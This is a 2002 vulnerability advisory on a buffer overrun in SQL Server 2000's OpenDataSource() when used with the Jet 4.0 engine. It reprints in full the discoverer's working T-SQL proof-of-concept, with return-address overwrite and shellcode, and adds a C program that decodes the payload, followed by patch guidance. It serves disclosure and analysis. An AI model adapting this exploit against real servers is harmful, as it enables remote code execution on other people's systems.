Buffer Overrun Vulnerability in Microsoft SQL Server 2000

A vulnerability exists in SQL Server 2000 when used in conjunction with the Microsoft Jet 4.0 database engine.

Ken Pfeil

June 20, 2002


Reported June 19, 2002, by NextGeneration Security Software.

VERSIONS AFFECTED

  • Microsoft SQL Server 2000 and all service packs

DESCRIPTION

A vulnerability exists in SQL Server 2000 when it is used in conjunction with the Microsoft Jet 4.0 database engine that can lead to an attacker executing arbitrary code on the vulnerable system. The vulnerability stems from a remotely exploitable buffer overrun in the OpenDataSource() function: as the proof-of-concept below shows, an overlong "Data Source" value passed through OpenDataSource() to the Jet OLE DB provider overwrites the stack, including the saved return address, and the attacker-supplied bytes then run in the context of the SQL Server process.

DEMONSTRATION

The discoverer posted the following code as proof-of-concept:
Simple Proof of Concept
***********************
This Transact SQL Script will create a file called "SQL-ODSJET-BO" on the root of the C: drive
on Windows 2000 SP 2 machines
 
 
-------8<---------
 
-- Simple Proof of Concept
-- Exploits a buffer overrun in OpenDataSource()
--
-- Demonstrates how to exploit a UNICODE overflow using T-SQL
-- Calls CreateFile() creating a file called c:\SQL-ODSJET-BO
-- I'm overwriting the saved return address with 0x42B0C9DC
-- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2
-- The address holds a jmp esp instruction.
--
-- To protect against this overflow download the latest Jet Service 
-- pack from Microsoft - http://www.microsoft.com/
-- 
-- David Litchfield ([email protected])
-- 19th June 2002
 
 
 
declare @exploit nvarchar(4000)
declare @padding nvarchar(2000)
declare @saved_return_address nvarchar(20)
declare @code nvarchar(1000)
declare @pad nvarchar(16)
declare @cnt int
declare @more_pad nvarchar(100)
 
select @cnt = 0
select @padding = 0x41414141
select @pad = 0x4141
 
while @cnt < 1063
begin 
                select @padding = @padding + @pad
                select @cnt = @cnt + 1
end
 
-- overwrite the saved return address
 
select @saved_return_address = 0xDCC9B042
select @more_pad = 0x4343434344444444454545454646464647474747
 
-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K Sp2
-- change if running a different service pack
 
select @code = 0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0C05052B8876FE877FFD0CCCCCCCCCC
select @exploit = N'SELECT * FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',''Data Source="c:'
select @exploit = @exploit + @padding + @saved_return_address + @more_pad + @code
select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions'
exec (@exploit)
 
------->8---------
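The script above is hard to read as a payload because it assembles the overflow string from hex literals cast to nvarchar. The C program below is an added example (not part of the NGSSoftware advisory or this article) that reconstructs the layout of that string and decodes the bytes it embeds: the size of the padding in UTF-16 bytes, the byte offsets at which the saved return address and the code land, the return-address value in host order, and what the shellcode does (the file name it pushes onto the stack, the CreateFile() address it loads into EAX, and the "call eax"). The byte arrays are copied from the script's hex literals; x86 little-endian byte order is assumed, and the opcode decoder knows only the handful of instructions the PoC uses.

```c
/*
 * Added example: reconstruct the layout of the OpenDataSource() PoC string
 * and decode its embedded bytes. Byte values copied from the T-SQL script.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* @saved_return_address = 0xDCC9B042 (little-endian 0x42B0C9DC) */
static const uint8_t SAVED_RET[4] = { 0xDC, 0xC9, 0xB0, 0x42 };

/* @code = 0x558BEC33C0... (52 bytes, as in the script) */
static const uint8_t CODE[] = {
    0x55, 0x8B, 0xEC, 0x33, 0xC0, 0x50,
    0x68, 0x54, 0x2D, 0x42, 0x4F,
    0x68, 0x44, 0x53, 0x4A, 0x45,
    0x68, 0x51, 0x4C, 0x2D, 0x4F,
    0x68, 0x43, 0x3A, 0x5C, 0x53,
    0x8D, 0x14, 0x24, 0x50, 0x50, 0x40, 0x50, 0x48, 0x50, 0x50,
    0xB0, 0xC0, 0x50, 0x52,
    0xB8, 0x87, 0x6F, 0xE8, 0x77, 0xFF, 0xD0,
    0xCC, 0xCC, 0xCC, 0xCC, 0xCC
};

/* @padding is 0x41414141 (two UTF-16 units) plus 1063 copies of 0x4141 (one
 * unit each). Jet receives the value as UTF-16, so each unit is 2 bytes. */
size_t padding_bytes(void) { return 2 * (2 + 1063); }          /* 2130 */

/* Byte offsets counted from the start of @padding (the "c:" prefix in the
 * Data Source value adds another 4 bytes in front of it). */
size_t offset_of_saved_return(void) { return padding_bytes(); }
size_t offset_of_code(void) { return padding_bytes() + 4 + 20; } /* @more_pad is 20 bytes */

uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

struct decoded {
    char     filename[64];  /* string left on the stack by the push imm32 chain */
    uint32_t call_target;   /* immediate of "mov eax, imm32" used by "call eax" */
    int      calls_eax;     /* 1 if FF D0 (call eax) was seen */
};

/* Minimal length decoder for the opcodes the PoC uses. Returns the number of
 * "push imm32" instructions seen, or -1 on an opcode outside that subset. */
int decode_shellcode(const uint8_t *code, size_t len, struct decoded *d)
{
    uint8_t pushes[8][4];
    int npush = 0;
    size_t i = 0;

    memset(d, 0, sizeof *d);
    while (i < len) {
        uint8_t op = code[i];
        size_t left = len - i;
        if (op == 0x68 && left >= 5) {                          /* push imm32 */
            if (npush < 8) memcpy(pushes[npush++], code + i + 1, 4);
            i += 5;
        } else if (op == 0xB8 && left >= 5) {                   /* mov eax, imm32 */
            d->call_target = le32(code + i + 1);
            i += 5;
        } else if (op == 0xFF && left >= 2 && code[i + 1] == 0xD0) { /* call eax */
            d->calls_eax = 1;
            i += 2;
        } else if ((op == 0x8B && left >= 2 && code[i + 1] == 0xEC) || /* mov ebp, esp */
                   (op == 0x33 && left >= 2 && code[i + 1] == 0xC0) || /* xor eax, eax */
                   (op == 0xB0 && left >= 2)) {                        /* mov al, imm8 */
            i += 2;
        } else if (op == 0x8D && left >= 3 && code[i + 1] == 0x14 && code[i + 2] == 0x24) {
            i += 3;                                             /* lea edx, [esp] */
        } else if (op == 0x55 || op == 0x50 || op == 0x52 || op == 0x40 ||
                   op == 0x48 || op == 0xCC) {   /* push ebp/eax/edx, inc/dec eax, int3 */
            i += 1;
        } else {
            return -1;
        }
    }
    /* Each push lowers ESP by 4, so the last immediate pushed sits lowest in
     * memory: reading upward from ESP yields the immediates in reverse push
     * order. The "push eax" after "xor eax, eax" supplies the terminating NUL. */
    size_t pos = 0;
    for (int k = npush - 1; k >= 0 && pos + 4 < sizeof d->filename; k--) {
        memcpy(d->filename + pos, pushes[k], 4);
        pos += 4;
    }
    d->filename[pos] = '\0';
    return npush;
}

int main(void)
{
    struct decoded d;
    int n = decode_shellcode(CODE, sizeof CODE, &d);
    printf("padding %zu bytes; saved return at +%zu; code at +%zu\n",
           padding_bytes(), offset_of_saved_return(), offset_of_code());
    printf("saved return overwritten with 0x%08X\n", le32(SAVED_RET));
    printf("%d pushes build \"%s\"; call eax with eax = 0x%08X\n", n, d.filename, d.call_target);
    return 0;
}
```

Running it shows why the two hard-coded addresses in the script matter: 0x42B0C9DC is the jmp esp the saved return is redirected to, and 0x77E86F87 is the kernel32 CreateFile() entry the code calls, both of which the PoC's comments tie to specific service pack builds, so the same bytes will not land on a differently patched box.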

VENDOR RESPONSE

The vendor, Microsoft, recommends that affected users apply the patch described in the Microsoft Knowledge Base article "ACC2002: Updated Version of Microsoft Jet 4.0 Available in Download Center," Q282010. Because the overrun is in the Jet engine rather than in SQL Server itself, the fix is the updated Jet 4.0 engine, not a SQL Server service pack.

 

CREDIT

Discovered by Mark Litchfield of Next Generation Security Software.
